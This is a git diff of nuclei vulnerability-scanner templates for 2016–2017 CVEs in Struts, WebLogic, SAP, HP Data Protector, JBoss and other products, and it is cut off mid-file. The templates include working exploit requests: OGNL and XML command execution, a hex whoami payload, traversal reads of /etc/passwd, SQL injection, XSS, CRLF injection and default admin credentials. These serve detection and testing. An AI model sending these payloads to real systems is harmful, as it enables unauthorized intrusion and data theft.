"00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml b/nuclei-templates/CVE-2016/CVE-2016-2389.yaml deleted file mode 100644 index 33b554b186..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2016-2389 - -info: - name: SAP xMII 15.0 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. - reference: - - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - - https://www.cvedetails.com/cve/CVE-2016-2389 - - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html - - https://www.exploit-db.com/exploits/39837/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2016-2389 - cwe-id: CWE-22 - tags: cve,cve2016,lfi,sap - -requests: - - method: GET - path: - - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-3081.yaml b/nuclei-templates/CVE-2016/CVE-2016-3081.yaml new file mode 100644 index 0000000000..b376316f88 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-3081.yaml @@ -0,0 +1,38 @@ +id: CVE-2016-3081 + +info: + name: Apache S2-032 Struts - Remote Code Execution + author: dhiyaneshDK + severity: high + description: | + Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions). + reference: + - https://cwiki.apache.org/confluence/display/WW/S2-032 + - https://struts.apache.org/docs/s2-032.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-3081 + - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2016-3081 + cwe-id: CWE-77 + tags: cve,cve2016,struts,rce,apache + metadata: + max-request: 1 + +http: + - raw: + - | + GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2016/CVE-2016-4975.yaml b/nuclei-templates/CVE-2016/CVE-2016-4975.yaml deleted file mode 100644 index ad77d61eda..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-4975.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2016-4975 - -info: - name: Apache mod_userdir CRLF injection - author: melbadry9,nadino,xElkomy - severity: medium - description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. - reference: - - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 - remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-4975 - cwe-id: CWE-93 - tags: cve,cve2016,crlf,generic,apache - -requests: - - method: GET - path: - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' - -# Enhanced by cs on 2022/02/14 diff --git a/nuclei-templates/CVE-2016/CVE-2016-6210.yaml b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml new file mode 100644 index 0000000000..0cf11fcf80 --- /dev/null +++ b/nuclei-templates/CVE-2016/CVE-2016-6210.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-6210 +info: + name: OpenSSH username enumeration < v7.3 + author: iamthefrogy,forgedhallpass + severity: medium + tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. + reference: + - http://seclists.org/fulldisclosure/2016/Jul/51 + - https://security-tracker.debian.org/tracker/CVE-2016-6210 + - http://openwall.com/lists/oss-security/2016/08/01/2 + - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2016-6210 + cwe-id: CWE-200 +network: + - host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' diff --git a/nuclei-templates/CVE-2016/cve-2016-0957.yaml b/nuclei-templates/CVE-2016/cve-2016-0957.yaml deleted file mode 100644 index 55a0fb1e4e..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-0957.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2016-0957 - -info: - name: Adobe AEM Console Disclosure - author: geeknik - description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. - reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - severity: high - tags: cve,cve2016,adobe,aem - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2016-0957 - -requests: - - method: GET - path: - - "{{BaseURL}}/system/console?.css" - headers: - Authorization: "Basic YWRtaW46YWRtaW4K" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Adobe" - - "java.lang" - - "(Runtime)" - condition: and diff --git a/nuclei-templates/CVE-2016/cve-2016-2004.yaml b/nuclei-templates/CVE-2016/cve-2016-2004.yaml deleted file mode 100644 index 36d3104dc0..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-2004.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2016-2004 - -info: - name: HP Data Protector A.09.00 - Arbitrary Command Execution - author: pussycat0x - severity: critical - tags: cve,cve2016,network,iot,hp,rce - description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623. - reference: - - https://www.exploit-db.com/exploits/39858 - - https://nvd.nist.gov/vuln/detail/CVE-2016-2004 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2016-2004 - cwe-id: CWE-306 - -network: - - inputs: - - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami - type: hex - - host: - - "{{Hostname}}" - - "{{Host}}:5555" - - matchers: - - type: word - encoding: hex - words: - - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system diff --git a/nuclei-templates/CVE-2016/cve-2016-2389.yaml b/nuclei-templates/CVE-2016/cve-2016-2389.yaml new file mode 100644 index 0000000000..364e21e9ba --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-2389.yaml @@ -0,0 +1,32 @@ +id: CVE-2016-2389 + +info: + name: SAP xMII 15.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978. + reference: + - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ + - https://www.cvedetails.com/cve/CVE-2016-2389 + tags: cve,cve2016,lfi,sap + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2016-2389 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-3081.yaml b/nuclei-templates/CVE-2016/cve-2016-3081.yaml deleted file mode 100644 index 86662795dc..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-3081.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2016-3081 - -info: - name: Apache S2-032 Struts RCE - author: dhiyaneshDK - severity: high - description: | - Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. - reference: - - https://cwiki.apache.org/confluence/display/WW/S2-032 - - https://struts.apache.org/docs/s2-032.html - tags: cve,cve2016,struts,rce,apache - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2016-3081 - cwe-id: CWE-77 - -requests: - - raw: - - | - GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2016/cve-2016-4975.yaml b/nuclei-templates/CVE-2016/cve-2016-4975.yaml new file mode 100644 index 0000000000..f94762b21e --- /dev/null +++ b/nuclei-templates/CVE-2016/cve-2016-4975.yaml @@ -0,0 +1,24 @@ +id: CVE-2016-4975 + +info: + name: Apache mod_userdir CRLF injection + author: melbadry9,nadino,xElkomy,sullo + severity: low + description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + tags: crlf,generic,cves,cve2016,apache + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-4975 + cwe-id: CWE-93 + +requests: + - method: GET + path: + - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + + matchers: + - type: regex + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + part: header diff --git a/nuclei-templates/CVE-2016/cve-2016-6210.yaml b/nuclei-templates/CVE-2016/cve-2016-6210.yaml deleted file mode 100644 index 86c405ed7a..0000000000 --- a/nuclei-templates/CVE-2016/cve-2016-6210.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2016-6210 - -info: - name: OpenSSH username enumeration < v7.3 - author: iamthefrogy,forgedhallpass - severity: medium - tags: network,openssh - description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. - reference: - - http://seclists.org/fulldisclosure/2016/Jul/51 - - https://security-tracker.debian.org/tracker/CVE-2016-6210 - - http://openwall.com/lists/oss-security/2016/08/01/2 - - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2016-6210 - cwe-id: CWE-200 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' - - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml b/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml deleted file mode 100644 index 2402b889a0..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-1000028.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-1000028 - -info: - name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion - author: pikpikcu,daffainfo - severity: high - description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests. - reference: - - https://www.exploit-db.com/exploits/45196 - - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 - - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 - - https://www.exploit-db.com/exploits/45196/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-1000028 - cwe-id: CWE-22 - tags: cve,cve2017,oracle,glassfish,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - - "{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and - -# Enhanced by mp on 2022/06/09 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml b/nuclei-templates/CVE-2017/CVE-2017-10075.yaml deleted file mode 100644 index d5bb533add..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-10075.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2017-10075 - -info: - name: Oracle Content Server Cross-Site Scripting - author: madrobot - severity: high - description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. - reference: - - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - - https://nvd.nist.gov/vuln/detail/CVE-2017-10075 - - http://www.securitytracker.com/id/1038940 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N - cvss-score: 8.2 - cve-id: CVE-2017-10075 - tags: cve,cve2017,xss,oracle - -requests: - - method: GET - path: - - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO" - - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml b/nuclei-templates/CVE-2017/CVE-2017-10271.yaml deleted file mode 100644 index 0417e66eeb..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-10271.yaml +++ /dev/null @@ -1,96 +0,0 @@ -id: CVE-2017-10271 - -info: - name: Oracle WebLogic Server - Remote Command Execution - author: dr_set,ImNightmaree - severity: high - description: | - Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. - reference: - - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - - https://github.com/SuperHacker-liuan/cve-2017-10271-poc - - http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html - - http://www.securitytracker.com/id/1039608 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2017-10271 - tags: cve,cve2017,rce,oracle,weblogic,oast - -requests: - - raw: - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - /bin/bash - - - -c - - - example.com - - - - - - - - - - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Language: en - Content-Type: text/xml - - - - - - - - - - - - - {{randstr}} - - - - - - - - - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - ".*" - - "{{randstr}}" - condition: or - - - type: status - status: - - 500 - - 200 - condition: or \ No newline at end of file diff --git a/nuclei-templates/CVE-2017/CVE-2017-11444.yaml b/nuclei-templates/CVE-2017/CVE-2017-11444.yaml deleted file mode 100644 index c13958058f..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-11444.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2017-11444 - -info: - name: Subrion CMS <4.1.5.10 - SQL Injection - author: dwisiswant0 - severity: critical - description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array." - reference: - - https://github.com/intelliants/subrion/issues/479 - - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q - - https://nvd.nist.gov/vuln/detail/CVE-2017-11444 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2017-11444 - cwe-id: CWE-89 - tags: cve,cve2017,sqli,subrion - -requests: - - method: GET - path: - - "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1" - matchers-condition: and - matchers: - - type: word - words: - - "projectdiscovery.io" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2017/cve-2017-11512.yaml b/nuclei-templates/CVE-2017/CVE-2017-11512.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-11512.yaml rename to nuclei-templates/CVE-2017/CVE-2017-11512.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml b/nuclei-templates/CVE-2017/CVE-2017-11586.yaml deleted file mode 100644 index 5816b710d3..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-11586.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2017-11586 -info: - name: dayrui FineCms 5.0.9 - Open redirect - author: 0x_Akoko - severity: low - description: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action. - reference: - - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse - - https://www.cvedetails.com/cve/CVE-2017-11586 - - https://vuldb.com/?id.104434 - tags: cve,cve2017,redirect,opentext - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2017-11586 - cwe-id: CWE-601 -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?c=weixin&m=sync&url=http://example.com' - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2017/cve-2017-12138.yaml b/nuclei-templates/CVE-2017/CVE-2017-12138.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12138.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12138.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12149.yaml b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml new file mode 100644 index 0000000000..4196407987 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-12149.yaml @@ -0,0 +1,57 @@ +id: CVE-2017-12149 + +info: + name: Jboss Application Server - Remote Code Execution + author: fopina,s0obi + severity: critical + description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data. + reference: + - https://chowdera.com/2020/12/20201229190934023w.html + - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12149 + - https://bugzilla.redhat.com/show_bug.cgi?id=1486220 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-12149 + cwe-id: CWE-502 + tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss + metadata: + max-request: 3 + +http: + - raw: + - | + POST /invoker/JMXInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + + - | + POST /invoker/EJBInvokerServlet/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + + - | + POST /invoker/readonly HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ClassCastException" + + - type: status + status: + - 200 + - 500 + +# Enhanced by mp on 2022/05/11 diff --git a/nuclei-templates/CVE-2017/cve-2017-12544.yaml b/nuclei-templates/CVE-2017/CVE-2017-12544.yaml similarity index 100% rename from nuclei-templates/CVE-2017/cve-2017-12544.yaml rename to nuclei-templates/CVE-2017/CVE-2017-12544.yaml diff --git a/nuclei-templates/CVE-2017/CVE-2017-12583.yaml b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml new file mode 100644 index 0000000000..4d088e27f0 --- /dev/null +++ b/nuclei-templates/CVE-2017/CVE-2017-12583.yaml @@ -0,0 +1,41 @@ +id: CVE-2017-12583 + +info: + name: DokuWiki - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12583 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-12583 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"DokuWiki" + tags: cve,cve2017,xss,dokuwiki + +requests: + - method: GET + path: + - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unable to parse at parameter "".' + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2017/CVE-2017-12637.yaml b/nuclei-templates/CVE-2017/CVE-2017-12637.yaml deleted file mode 100644 index 572bcf7a8c..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12637.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2017-12637 - -info: - name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 - author: apt-mirror - severity: high - description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. - reference: - - https://www.cvedetails.com/cve/CVE-2017-12637/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf - - http://www.sh0w.top/index.php/archives/7/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2017-12637 - cwe-id: CWE-22 - tags: cve,cve2017,sap,lfi,java,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "WEB-INF" - - "META-INF" - condition: and - part: body diff --git a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml b/nuclei-templates/CVE-2017/CVE-2017-12794.yaml deleted file mode 100644 index 6764f0ceab..0000000000 --- a/nuclei-templates/CVE-2017/CVE-2017-12794.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2017-12794 - -info: - name: Django Debug Page - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). - reference: - - https://twitter.com/sec715/status/1406779605055270914 - - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ - - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2017-12794 - cwe-id: CWE-79 - tags: xss,django,cve,cve2017 - metadata: - max-request: 1 - -http: - - method: GET - path: - - 